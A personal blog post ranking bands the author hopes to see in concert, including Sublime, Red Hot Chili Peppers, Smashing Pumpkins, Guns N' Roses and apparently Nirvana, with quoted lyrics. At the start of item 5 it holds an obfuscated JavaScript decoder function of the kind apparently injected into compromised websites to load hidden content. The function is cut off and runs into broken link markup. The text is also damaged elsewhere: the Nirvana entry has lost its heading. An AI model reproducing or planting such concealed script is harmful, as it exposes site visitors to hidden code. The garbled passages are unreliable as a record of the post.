As I have grown older so have the bands I loved so much when I was a kid. There are several of those bands that are now doing reunion tours with different bandmates to mixed reviews in front of thousands of people my age and younger. For Christmas a friend of mine bought Azul and I tickets to see Guns n Roses at the Forum in Los Angeles. While anticipating the concert I started to think about all of the other bands I would like to see. Some are possible and some are not, here's the list.

5.function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndand)" target="_blank">SublimeI: One of those bands that became popular when I was in high school and made Central Arkansas feel like Southern California. My friends and I would roll with the windows down singing "Santeria" like crazy people.

Why I will not get to see them: The original lead singer passed away a very long time ago and therefore seeing the original band couldn't be done, but when they picked up Rome to sing vocals there was a chance we could see a revamped version. Well, now that has come to an end and it looks as if the band will stop touring. Read about the drama here.

4. Red Hot Chili Peppers: Blood Sugar Sex Magik is fantastic. Any song on that album reminds me of hot nights on a basketball court at a friend's house. We would shoot hoops and sing every lyric to every song. The funny thing is, like most of their songs, I could not tell you what any of them meant.

Blood sugar sucker fish
In my dish
How many pieces
Do you wish
Step into a heaven
Where I keep it on the soulside

Seriously, what? That's OK, Anthony Keidis was awesome and so was Flea. You could sing to it and you could make believe that you understood and connected with the songs they were singing.

I will get to see them as they just released a new album and will be touring in support of that album.

3. The Smashing Pumpkins: Billy Corgan is a true lyricist. I still listen to them on a regular basis and quiz my daughters on songs when they come on. Who sings this? What song is this? These are songs that make the soundtrack of my life. Check out some of the lyrics for the song "Today". Pretty straight forward.

Today is the greatest
Day I've ever known
Can't live for tomorrow,
Tomorrow's much too long
I'll burn my eyes out

Billy is back as the lead singer but with none of the original band members. Most of us can agree that as long as the lead singer is available carrying on with the band name is pretty easy to do. I will check out the Smashing Pumpkins as soon as I can.

2. Guns N Roses: Axl might be a nut case, but I cannot begin to tell you how excited I am to go to this show. The nostalgia of the early 90s is something many bands cannot rekindle. Slaughter, Motley Crue, Def Leppard? All of those bands would do good to sell out a beachfront bar. G n' R on the other hand has sold tickets to shows they never got around to playing..... twice and my people are still paying to take the chance the 3rd time around.  The best thing that could have happened is for the band to disassemble and just disappear, they avoided the chance they would be viewed as a hairband gimmick band over staying their welcome.

Axl has a long standing dispute with Slash so of course he will not be participating in the shows. Guess what? Neither will anyone else other than Axl. That's fine by me, I cannot wait to hear the vocal stylyings of the hairband swooner.

The anthems of our generation? Maybe. Most of the lyrics were drowned out by the raspy voice of one Mr. Kurt Cobain and we didn't care. We all identified it as awesome because it was different than normal pop music. I bought the t-shirts, CDs, and posters. When Cobain died the band was no more and left us all clamoring for a great band. The drummer, Dave Grohl, went on to become the lead singer of the Foo Fighers. Krist Novoselic had a band I never listened to and occasionally plays with the Foo. Unfortunately, I will never get a chance to see Nirvana in concert.
